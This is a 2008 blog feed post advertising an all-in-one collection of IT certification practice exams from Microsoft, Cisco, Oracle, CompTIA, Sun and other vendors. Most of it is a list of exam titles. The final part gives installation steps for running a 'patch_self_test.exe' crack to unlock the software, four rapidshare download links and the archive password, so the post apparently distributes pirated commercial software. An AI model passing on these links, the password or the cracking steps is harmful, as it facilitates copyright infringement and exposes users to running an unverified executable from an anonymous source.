Mcft Certifications</p>
<p>CONTENTS:</p>
<p>70-086 Implementing and Supporting Mcft Systems<br />
Management Server 2.0<br />
70-210 Installing, Configuring and Administering<br />
Mcft Windows 2000 Professional<br />
70-214 Implemening and Administering Security in a<br />
Mcft Windows 2000 Network<br />
70-215 Installing, Configuring and Administering<br />
Mcft Windows 2000 Server<br />
70-216 Implementing and Supporting Mcft Windows 2000<br />
Network Infrastructure<br />
70-217 Implementing and Supporting Mcft Mcft<br />
Windows 2000 Directory Services Infrastructure<br />
70-218 Managing a Mcft Windows 2000 Network Environment<br />
70-219 Designing a Windows 2000 Directory Services<br />
Infrastructure + 4 Case Studies<br />
70-220 Designing Security for a Windows 2000 Network + 4 Case<br />
Studies<br />
70-221 Designing a Windows 2000 Network Infrastructure + 4 Case Studies<br />
70-222 Migrating from Mcft Windows NT 4.0 to Mcft<br />
Windows 2000<br />
70-223 Installing, Configuring, and Administering Mcft Clustering Services by Using Mcft Windows 2000 Advanced Server<br />
70-224 Installing, Configuring, and Administering Mcft<br />
Exchange 2000 Server<br />
70-225 Designing and Deploying a Messaging Infrastructure<br />
with Mcft Exchange 2000 Server<br />
70-226 Designing Highly Available Web Solutions with Mcft<br />
Windows 2000 Server Technologies<br />
70-227 Installing, Configuring, and Administering Mcft Internet Security and Acceleration (ISA) Server 2000, Enterprise Edition<br />
70-228 Installing, Configuring, and Administering Mcft SQL Server 2000 Enterprise Edition<br />
70-229 Designing and Implementing Databases with Mcft SQL<br />
Server 2000 Enterprise Edition<br />
70-230 Designing and Implementing Solutions with Mcft BizTalk Server 2000, Enterprise Edition<br />
70-232 Implemting and Maintaining Highly Available Web Solutions<br />
with Mcft Windows 2000 Server Technologies and Mcft Application Center 2000<br />
70-234 Designing and Implementing Solutions with Mcft<br />
Commerce Server 2000<br />
70-244 Supporting and Maintaining a Mcft Windows<br />
NT Server 4.0 Network<br />
70-270 Installing, Configuring, and Administering Mcft<br />
Windows XP Professional<br />
70-271 Supporting Users and Troubleshooting a Mcft<br />
Windows XP Operating System<br />
70-272 Supporting Users and Troubleshooting Desktop Applications on a Mcft Windows XP Operating System<br />
70-282 Designing, Deploying, and Managing a Network Solution for a Small- and Medium-Sized Business<br />
70-284 Implementing and Managing Mcft Exchange Server 2003<br />
70-285 Designing a Mcft Exchange Server 2003 Organization<br />
70-290 Mangaing and Maintaining a Mcft Exchange Server 2003 Environment<br />
70-291 Implementing, Managing, and Maintaining a Mcft Windows Server 2003 Network Infrastructure<br />
70-292 Managing and Maintaining a Mcft Windows Server 2003 Environment for an MCSA Certified on Windows 2000<br />
70-293 Planning and Maintaining a Mcft Windows Server 2003 Network Infractructure<br />
70-294 Planning, Implementing, and Maintaining a Mcft Windows Server 2003 Active Directory Infractructure<br />
70-296 Planning, Implementing, and Maintaining a Mcft Windows Server 2003 Environment for an MCSA Certified on Windows 2000<br />
70-297 Designing a Mcft Windows Server 2003 Active Directory and Network Infractructure<br />
70-298 Designing Security for a Mcft Windows Server 2003 Network<br />
70-299 Implementing and Administering Security in a Mcft Windows Server 2003 Network<br />
70-300 Analyzing Requirements and Defining Mcft .NET Solutions Architectures<br />
70-301 Managing, Organizing, and Delivering IT Projects by Using Mcft Solutions Framework 3.0<br />
70-305 Developing and Implementing Web Applications with Mcft Visual Basic .NET and Mcft Visual Studio .NET<br />
70-306 Developing and Implementing Windows-based Applications with Mcft Visual Basic .NET and Mcft Visual Studio .NET<br />
70-310 Developing XML Web Services and Server Components with Mcft Visual Basic .NET and the Mcft .NET Framework<br />
70-315 Developing and Implementing Web Applications with Mcft Visual C# .NET and Mcft Visual Studio .NET<br />
70-316 Developing and Implementing Windows-based Applications with Mcft Visual C# .NET and Mcft Visual Studio .NET<br />
70-320 Developing XML Web Services and Server Components with Mcft Visual C# .NET and the Mcft .NET Framework<br />
70-330 Implementing Security for Applications with Mcft Visual Basic .NET<br />
70-340 Implementing Security for Applications with Mcft Visual C# .NET</p>
<p>Mcft Office Certifications</p>
<p>Access 2003 Core<br />
Excel 2003 Core<br />
Excel 2003 Expert<br />
Outlook 2003 Core<br />
PowerPoint 2003 Core<br />
Word 2003 Core<br />
Word 2003 Expert<br />
Access 2000 Core<br />
Excel 2000 Core<br />
Excel 2000 Expert<br />
PowerPoint 2000 Core<br />
Word 2000 Core<br />
Word 2000 Expert<br />
Access 2002 Core<br />
Excel 2002 Core<br />
Excel 2002 Expert<br />
PowerPoint 2002 Core<br />
Word 2002 Core<br />
Word 2002 Expert</p>
<p>Cisco Certifications</p>
<p>640-801 Cisco Certified Network Associate<br />
640-811 Interconnecting Cisco Networking Devices<br />
640-821 Introduction to Cisco Networking Technologies<br />
640-861 Designing for Cisco Internetwork Solutions (DESIGN)<br />
642-432 Cisco Voice Over IP<br />
642-501 Securing Cisco IOS Networks<br />
642-511 Cisco Secure Virtual Private Networks (CSVPN)<br />
642-521 Cisco Cisco Secure PIX Firewall Advanced<br />
642-531 Cisco Secure Intrusion Detection System (CSIDS)<br />
642-541 Cisco SAFE Implementationi (CSI)<br />
642-577 Cisco Wireless LAN Design Specialist<br />
642-582 Cisco Wireless LAN Support Specialist<br />
642-611 Implementing Cisco MPLS (MPLS)<br />
642-642 Implementing Cisco Quality of Service (QoS)<br />
642-661 Configuring BGP on Cisco Routers<br />
642-801 Building Scalable Cisco Internetworks<br />
642-811 Building Cisco Multilayer Switched Networks v2.0 (BCMSN)<br />
642-821 Building Cisco Remote Access Networksv2.0 (BCRAN)<br />
642-831 Cisco Internetwork Troubleshooting Support<br />
642-871 Designing Cisco Network Service Architectures<br />
642-891 Cisco Composite Exam<br />
(ISC)2 Certifications</p>
<p>CISSP CISSP<br />
PMI Certifications</p>
<p>CAPM Certified Associate in Project Management<br />
PMP Project Management Professional 2000<br />
CheckPoint Certifications</p>
<p>156-110 Check Point Certified Security Principles Associate<br />
156-210 Check Point Certified Security Administrator 156-210.4<br />
CIW Certifications</p>
<p>1D0-420 CIW Site Designer<br />
1D0-425 CIW E-Commerce<br />
1D0-435 JavaScript Fundamentals<br />
ORACLE Certifications</p>
<p>1Z0-001 Introduction to Oracle: SQL and PL/SQL<br />
1Z0-007 Introduction to Oracle9i<br />
1Z0-010 Oracle8: New Features for Administrators (Certication Upgrade from Oracle7 to Oracle<br />
1Z0-020 Oracle8i: New Features for Administrators<br />
1Z0-030 Oracle9i: New Features for Administrators<br />
1Z0-031 Oracle9i: DBA Fundamentals I<br />
1Z0-032 Oracle9i Database: Fundamentals II<br />
1Z0-033 Oracle9i Performance Tuning<br />
1Z0-035 Oracle9i New Features for Oracle7.3 and Oracle8 OCPs<br />
1Z0-040 Oracle Database 10g: New Features for Administrators<br />
1Z0-042 Oracle Database 10g: Administration I<br />
1Z0-101 Develop PL/SQL Program Units<br />
1Z0-130 Oracle Forms Rel. 1 to Rel. 6/6i New Features<br />
1Z0-131 Build Internet Applications I<br />
1Z0-132 Build Internet Applications II<br />
1Z0-147 Oracle9i: Program with PL/SQL<br />
NOVEL Certifications</p>
<p>50-632 Networking Technologies<br />
50-649 TCP/IP fro Networking Professionals<br />
50-650 Internet Security Management with BorderManager Enterprise Edition 3.5<br />
50-653 NetWare 5.1 Administration<br />
50-654 NetWare 5.1 Advanced Administration<br />
50-658 Service and Support<br />
50-664 Novel eDirectory Design &amp; Implementation<br />
50-676 Upgrading to NetWare 6<br />
50-677 Foundatations of Novel Networking<br />
50-681 Novel Network Nanagement: NetWare 6<br />
IBM Certifications</p>
<p>IBM-700 DB2 UDB V8.1 Family Fundamentals<br />
LOTUS Certifications</p>
<p>273 LotusScript in Notes for Advanced Developers<br />
513 Using JavaScript in Domino R5 Application<br />
601 Notes Domino 6 Application Development Update<br />
602 Notes Domino 6 System Administration Update<br />
610 Notes Domino 6 Application Development Foundataion Skill<br />
611 Notes Domino 6 Application Development Intermediate Skill<br />
620 Notes Domino 6 System Administration Operating Fundamentals<br />
621 Notes Domino 6: Building the Infrastructure<br />
622 Notes Domino 6: Managing Servers and Users<br />
CompTIA Certifications</p>
<p>220-301 A+ 2003 Core Hardware<br />
220-302 A+ 2003 Operating System Technologies<br />
IK0-002 i-Net+<br />
N10-002 Network+ 2002 Objectives<br />
N10-003 Network+ 2005 Objectives<br />
PK0-002 Project+<br />
SK0-002 server+<br />
SY0-101 Security+<br />
XK0-001 Linux+<br />
SUN Certifications</p>
<p>310-014 Sun Certified System Administrator for Solaris 9 OE, Part I<br />
310-015 Sun Certified System Administrator for Solaris 9 OE, Part II<br />
310-016 Sun Certified System Administrator for Solaris 9 OE, Upgrade Exam<br />
310-025 Sun Certified Programmer for Jave 2 Platform 1.2<br />
310-035 Sun Certified Programmer for Jave 2 Platform 1.4<br />
310-036 Sun Certified Programmer for Jave 2 Platform Upgrade Exam<br />
310-044 Sun Certified Network Administrator for the Solaris 9 Operating Environment</p>
<p>Installation notes:<br />
1. unRAR, mount/burn<br />
2. Install whatever exams you want<br />
3. Copy the patch_self_test.exe file to the installation directory (typically this is C:\Program Files\SelfTest)<br />
4. Run the patch and you’re good to go! If you decide later to install more exams, you need not re-apply the patch.</p>
<p>Download:</p>
<p>http://rapidshare.com/files/37258076/Test_AIO_-_CairaC.part1.rar<br />
http://rapidshare.com/files/37263507/Test_AIO_-_CairaC.part2.rar<br />
http://rapidshare.com/files/37269617/Test_AIO_-_CairaC.part3.rar<br />
http://rapidshare.com/files/37273685/Test_AIO_-_CairaC.part4.rar</p>
<p>Size &#8211; 100 MB each &amp; 38 MB for part 4</p>
<p>Password:</p>
<p>CairaC</p>
</div>
</div>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/7/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/7/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=7&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/08/the-ultimate-certification-practise-exam-collection/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
	</channel>
</rss>